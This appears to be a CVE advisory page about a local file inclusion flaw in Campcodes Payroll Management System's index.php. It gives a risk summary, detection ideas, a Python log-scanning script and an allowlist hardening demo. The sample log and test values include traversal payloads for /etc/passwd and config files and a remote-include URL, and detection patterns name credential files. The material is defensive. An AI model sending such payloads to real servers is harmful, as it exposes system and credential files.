CVE Alert: CVE-2025-9529 – Campcodes – Payroll Management System
CVE-2025-9529
A weakness has been identified in Campcodes Payroll Management System 1.0. The affected element is the function include of the file /index.php. Manipulation of the argument page causes file inclusion. The attack can be carried out remotely. A public exploit is available.
AI Summary Analysis
Risk verdict
High risk: remote, unauthenticated file inclusion with a public PoC available; exploitation urgency is elevated.
Why this matters
For a payroll system, local file inclusion can expose sensitive files (configuration, credentials, source code) and has a partial impact on confidentiality, integrity and availability. An attacker could use it to read internal data or pivot within the host environment, with real potential to disrupt payroll processing or surface further weaknesses.
Most likely attack path
An attacker sends crafted requests to index.php (page parameter) that trigger the include, without authentication and with no user interaction. The vulnerability is remotely reachable and low effort to exploit, and PoCs exist, so automated tooling could scan for and exploit it at scale. What a successful attempt achieves depends on the server's PHP configuration and file-system permissions, potentially enabling local file reads or the abusive inclusion of otherwise benign files.
Who is most exposed
Web-facing deployments of Campcodes Payroll Management System 1.0 are most at risk, especially on shared hosting or on-premises servers where index.php is publicly reachable and include handling is permissive. Organisations with minimal input validation around include targets or outdated PHP configurations are particularly exposed.
Detection ideas
- Web logs show repeated requests to /index.php?page= with traversal-like values (e.g., ../)
- PHP error logs reference include statements or failed file reads tied to index.php
- IDS/WAF alerts for LFI-like patterns or suspicious include targets
- Indicators of automated scanning or PoC payloads in network traffic
- Unusual access patterns to config or credential files
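The first four detection ideas above can be turned into a log triage script. The following is an added example, not code from the advisory or the vendor: it parses constructed combined-format web server log lines (the IPs, timestamps and user agents are made up for the example), URL-decodes the page parameter of requests to /index.php, flags traversal, absolute paths, stream wrappers (the allow_url_include case), null bytes and well-known sensitive file names, and then lists source addresses that produced enough hits to look like automated scanning. The field layout and thresholds are assumptions to adapt to your own logging format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx "combined" log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Sep/2025:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Sep/2025:10:01:05 +0000] "GET /index.php?page=employees HTTP/1.1" 200 7310 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Sep/2025:10:02:11 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "python-requests/2.32"
198.51.100.7 - - [10/Sep/2025:10:02:12 +0000] "GET /index.php?page=..%2f..%2fconfig HTTP/1.1" 200 210 "-" "python-requests/2.32"
198.51.100.7 - - [10/Sep/2025:10:02:13 +0000] "GET /index.php?page=http://198.51.100.99/inc.txt HTTP/1.1" 500 0 "-" "python-requests/2.32"
"""

# Combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

SENSITIVE_NAMES = re.compile(r'(passwd|shadow|config|\.env|credential)', re.I)


def suspicious_reasons(value: str) -> list[str]:
    """Return the LFI indicators present in one ?page= value (empty list if none)."""
    # parse_qs already decoded once; decode twice more so double-encoded
    # sequences such as %252e%252e are also caught.
    decoded = unquote(unquote(value))
    reasons = []
    if '..' in decoded.replace('\\', '/'):
        reasons.append('path traversal')
    if decoded.startswith('/'):
        reasons.append('absolute path')
    if re.match(r'^[a-z][a-z0-9+.-]*://', decoded, re.I):
        reasons.append('stream wrapper / remote include')
    if '\x00' in decoded:
        reasons.append('null byte')
    if SENSITIVE_NAMES.search(decoded):
        reasons.append('sensitive file name')
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse log lines and return one finding per suspicious /index.php?page= request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in the expected format
        parts = urlsplit(m['target'])
        if not parts.path.endswith('/index.php'):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get('page', []):
            reasons = suspicious_reasons(value)
            if reasons:
                findings.append({
                    'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status']),
                    'page': value, 'reasons': reasons,
                })
    return findings


def scanning_sources(findings: list[dict], threshold: int = 2) -> list[str]:
    """Source IPs with at least `threshold` findings: a hint of automated scanning."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} status={h['status']} page={h['page']!r}: {', '.join(h['reasons'])}")
    print('likely scanners:', scanning_sources(hits))
```

A 200 response on a traversal request is the most urgent signal, because it suggests the include actually succeeded; a 500 on a URL-wrapper request usually means allow_url_include is off, which is still worth correlating with the same source address.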
Mitigation and prioritisation
- Apply the vendor patch or upgrade to the fixed version; confirm that the include handling in index.php has been corrected.
- Disable or strictly validate user-controlled include targets; remove the page parameter or restrict it to known values.
- Enforce PHP settings: disable allow_url_include; restrict file-system permissions; implement a secure include_path.
- Implement input validation and output encoding; add application-layer allowlists for include targets.
- Enhance monitoring and alerting for LFI indicators; perform network segmentation and routine vulnerability scanning.
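To make the allowlist recommendation concrete, here is an added example that models the weak and the hardened resolution of the page parameter side by side. It is not the product's code (the page names, file names and directory are constructed for the example), and it is written in Python to show the pattern that a PHP fix would follow: map the request value through a fixed allowlist, canonicalise the resulting path, and confirm it still lies inside the pages directory before anything is included.

```python
import os
import tempfile

# Allowlist: the only ?page= values the handler accepts, each mapped to a file under the
# pages directory. Names are constructed for this example, not the product's own.
PAGE_ALLOWLIST = {
    "home": "home.php",
    "employees": "employees.php",
    "payroll": "payroll.php",
}


def resolve_page_unsafe(pages_dir: str, page: str) -> str:
    """Model of the weak pattern: the request value is used directly as the path.

    Traversal ("../"), absolute paths and, with allow_url_include enabled, URL
    wrappers all pass straight through to the include call.
    """
    return os.path.join(pages_dir, page)


def resolve_page_safe(pages_dir: str, page: str):
    """Model of the hardened pattern.

    Look the request value up in the allowlist, then confirm the canonical path of
    the mapped file is inside pages_dir. Returns None whenever the request must be
    rejected; the caller should then serve a 404 rather than guess.
    """
    filename = PAGE_ALLOWLIST.get(page)
    if filename is None:
        return None                       # unknown page name: reject outright
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # Defence in depth: even an allowlisted entry must resolve below the base
    # directory (guards against a mis-edited allowlist or a symlinked page file).
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def build_demo_dir() -> str:
    """Create a temporary pages directory holding two real page files (constructed)."""
    d = tempfile.mkdtemp(prefix="payroll_pages_")
    for name in ("home.php", "employees.php"):
        with open(os.path.join(d, name), "w") as fh:
            fh.write("<?php // constructed placeholder page ?>\n")
    return d


if __name__ == "__main__":
    d = build_demo_dir()
    for value in ("home", "payroll", "../../etc/passwd", "http://example.invalid/x"):
        print(f"{value!r}: unsafe -> {resolve_page_unsafe(d, value)}")
        print(f"{value!r}: safe   -> {resolve_page_safe(d, value)}")
```

Note that "payroll" is allowlisted but its file is absent in the demo directory, so the hardened resolver still returns None: the allowlist decides which names are valid, and the file-system check decides whether the mapped file is actually there, with no fallback to the raw request value in either case.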
If KEV or EPSS indicates elevated risk, prioritise remediation as a top fix.